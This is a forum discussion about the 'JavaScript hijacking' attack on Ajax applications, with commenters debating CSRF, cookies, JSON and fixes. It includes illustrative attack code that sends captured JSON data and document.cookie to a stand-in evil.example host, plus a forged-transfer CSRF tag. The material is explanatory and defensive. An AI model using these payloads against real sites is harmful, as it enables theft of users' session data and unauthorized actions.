Web 2.0 Under Siege
Robert writes "Security researchers have found what they say is an entirely new kind of web-based attack, and it only targets the Ajax applications so beloved of the 'Web 2.0' movement. Fortify Software, which said it discovered the new class of vulnerability and has named it 'JavaScript hijacking', said that almost all the major Ajax toolkits have been found vulnerable. 'JavaScript Hijacking allows an unauthorized attacker to read sensitive data from a vulnerable application using a technique similar to the one commonly used to create mashups.'"
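To make the "technique similar to the one commonly used to create mashups" concrete, here is a rough sketch of the attack as it was described at the time. All host names and endpoints below are made up, and the capture trick depended on browser behavior of that era (evaluating an array literal would invoke a redefined Array constructor); browsers have since closed that particular hole.

    <!-- A hostile page, e.g. evil.example/trap.html -->
    <script>
      var stolen = [];
      // Redefine the Array constructor before the victim's JSON arrives. In some
      // browsers of the time, evaluating an array literal invoked this constructor,
      // so every element assignment could be observed through a setter.
      function Array() {
        var self = this;
        for (var i = 0; i < 100; i++) {
          (function (n) {
            self.__defineSetter__(n, function (value) { stolen.push(value); });
          })(i);
        }
      }
    </script>
    <!-- The victim's session cookie for victim-site.example is attached automatically,
         and the authenticated JSON array comes back and is executed as script here. -->
    <script src="http://victim-site.example/private/contacts.json"></script>
    <script>
      // Ship whatever was captured off to the attacker.
      new Image().src = "http://evil.example/log?d=" + encodeURIComponent(stolen.join("|"));
    </script>

The point is that the data request is an ordinary SCRIPT include, so the browser attaches the victim's cookie, and the response is executable JavaScript rather than inert data, so the hostile page gets to watch it being built.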
XSS (Score:2, Interesting)
XSRF (Score:2, Interesting)
http://en.wikipedia.org/wiki/Cross-site_request_forgery
Re:XSS (Score:1, Interesting)
XSS/JS injection is more about injecting alien JavaScript into site A.
OK so far.
Darn, I thought it was to make site A execute code or retrieve info from the user's system, not from another site.
Would you care to elaborate a little?
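To make the distinction concrete (illustrative snippets with made-up hosts, not working exploits): XSS means the attacker's script runs inside site A's own pages, typically because site A echoes untrusted input; XSRF/CSRF means a hostile page merely makes the victim's browser send a request to site A, riding on whatever cookies the browser already holds for it.

    <!-- XSS: site A reflects a query parameter without escaping, so this URL
         runs attacker script in site A's origin, with access to its cookies/DOM -->
    http://site-a.example/search?q=<script>new Image().src="http://evil.example/steal?c="+document.cookie</script>

    <!-- CSRF: site B never runs code in site A's origin; it just makes the
         victim's browser issue an authenticated request to site A -->
    <img src="http://site-a.example/account/transfer?to=attacker&amount=1000">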
Where's the problem? (Score:5, Interesting)
So essentially it means that the attacker can use the user's authentication cookie to authenticate again, and then run JavaScript with that authentication. But why are AJAX apps storing authentication in cookies? If you need to store authentication (user session IDs, etc.), store it in a variable within the JavaScript. That will stay there until a page refresh clears the variables, and how many page refreshes occur with AJAX?
AJAX apps do not need to (and should not!) store user authentication in cookies. Cookies are useful for keeping a continuous session open across page loads; AJAX needs no such session. If they don't use cookies, then other sites cannot ride on that authentication.
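Roughly like this (a minimal sketch; the endpoint paths and the X-Session-Id header are made-up names): log in once over the AJAX channel, keep the returned session ID in a JavaScript variable, and send it explicitly with every request.

    var sessionId = null;   // lives only in this page's JavaScript, never in a cookie

    function login(user, pass, done) {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "/login", true);
      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
      xhr.onreadystatechange = function () {
        if (xhr.readyState === 4 && xhr.status === 200) {
          sessionId = xhr.responseText;   // an opaque token issued by the server
          done();
        }
      };
      xhr.send("user=" + encodeURIComponent(user) + "&pass=" + encodeURIComponent(pass));
    }

    function fetchData(done) {
      var xhr = new XMLHttpRequest();
      // The token travels in an explicit header, not in anything the browser
      // attaches automatically, so a SCRIPT tag on a hostile page gets an
      // unauthenticated response.
      xhr.open("GET", "/data", true);
      xhr.setRequestHeader("X-Session-Id", sessionId);
      xhr.onreadystatechange = function () {
        if (xhr.readyState === 4 && xhr.status === 200) done(xhr.responseText);
      };
      xhr.send(null);
    }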
Where's the problem? (What am I missing?)
PimTerry
Shirky's Law: (Score:5, Interesting)
The obvious implication of Shirky's Law is that Web 2.0 services are an attractive nuisance and give spammers and other griefers an incentive to game the system. Any new web service has to account for this and build in extremely high levels of security. Obviously nobody is doing this.
We've already seen this before (Score:5, Interesting)
It actually could be pretty nasty. I think the only solution is to pass authentication tokens through the URL or input parameters (not through cookies).
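For instance (a minimal sketch; the endpoint and token value are placeholders, and the server is assumed to compare the token against the user's session):

    // Token handed to the page by the server when it rendered the HTML:
    var authToken = "placeholder-token-value";

    var xhr = new XMLHttpRequest();
    // The token travels as an explicit parameter, so a forged cross-site
    // SCRIPT or IMG request, which only carries cookies, will not have it.
    xhr.open("GET", "/messages?format=json&token=" + encodeURIComponent(authToken), true);
    xhr.onreadystatechange = function () {
      if (xhr.readyState === 4 && xhr.status === 200) {
        // hand xhr.responseText to the page's own rendering code
      }
    };
    xhr.send(null);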
It might be a good time to use the Firefox NoScript plugin if you're not using it already. Only allow JavaScript on sites you trust.
I said that EVERY time AJAX/Web 2.0 hype was posted (Score:4, Interesting)
Re:Okay, I'll be the first to ask. (Score:3, Interesting)
Re:sigh (Score:4, Interesting)
That'll be because it is. It's basically an observation that CSRF on a site which returns data in JSON format allows the attacker to read the content of the result. Well, duh. Of course that happens. It's one of the reasons I've always opposed JSON as a useful format.
The other reason is equally bad, but only applies to "mash up" type situations: the coder of the client has to trust the server with access to all data in the client. This makes it useless in many situations.
The best solution would be to scrap the current security system, make cookies on subrequests (including those made via XMLHttpRequest) dependent on both the domain the request goes to *and* the domain of the page that caused the request, and allow XMLHttpRequest to access servers other than the page source. This would both fix CSRF and eliminate the need for JSON. What more do you want?
Re:XML is so last week. What's really wrong. (Score:4, Interesting)
You don't say. My first thought on hearing about the entire idea was "why would you want to let a foreign server run its code on your page?"
The real problem is JavaScript's excessive dynamism. Because you can redefine objects in one script and have that affect another script from a different source, the language is fundamentally vulnerable.
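A small illustration of that dynamism (made-up example; the spy function stands in for whatever the first script wants to do with the data): one script quietly wraps a built-in, and every later script on the page flows through the wrapper without knowing it.

    <!-- first script, loaded from one source -->
    <script>
      Array.prototype.join = (function (orig) {
        return function (sep) {
          // every later call to join(), from any script on the page, passes through here
          spy(this.slice());            // keep a copy of the data
          return orig.apply(this, arguments);
        };
      })(Array.prototype.join);
      function spy(copy) { /* send the copy wherever this script's author likes */ }
    </script>

    <!-- second script, from a different source, is affected without knowing it -->
    <script>
      var secret = ["alice", "hunter2"];
      secret.join(",");                 // silently observed by the wrapper above
    </script>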
Err... if I don't let foreign code execute (e.g. by doing 'var e = document.createElement("script"); e.src = "http://www.someotherserver.com/potential-securit
The last attempt to fix this problem involved adding restrictions to XMLHttpRequest, but that only plugged some of the holes.
The fix seems obvious to me:
* cookies on subrequests must be tied to the domain of the page that initiated the request as well as the domain the request goes to; this reduces the possibility of CSRF. So if www.a.com has a web page that requests data from www.b.com, the browser will only send a cookie if www.b.com set one in response to a previous request initiated by www.a.com. This applies to SCRIPT, IFRAME, IMG, and LINK tags, etc.
* XMLHttpRequest must not be tied to the same-domain policy. Attempts to access a different domain should prompt the user for confirmation the first time any particular requester/receiver domain pair is used. This means mashups (and other applications that need cross-domain access) can be written that do not need to use JSON. JSON parsing through script insertion or eval() is insecure and should be deprecated (a quick illustration follows below).
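To illustrate that last point (a minimal sketch; native JSON.parse arrived in browsers later, and Crockford's json2.js was the usual stopgap at the time):

    var text = '{"user":"alice","balance":42}';   // imagine this came back in xhr.responseText

    // Dangerous: eval() executes whatever the text contains. If an attacker can
    // influence the response, it runs with the page's full privileges.
    var viaEval = eval("(" + text + ")");

    // Safer: treat the text strictly as data; anything that is not plain JSON throws.
    var viaParse = JSON.parse(text);

Either way the goal is the same: the response should be parsed as data, not run as a program.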
At a minimum, it's probably desirable for the browser to insist that, on secure pages, all JavaScript and data must come from the same domain as the main page. No "mashups" on secure pages.
Scripts, yes. I don't see the need to ensure that data originates in the same domain.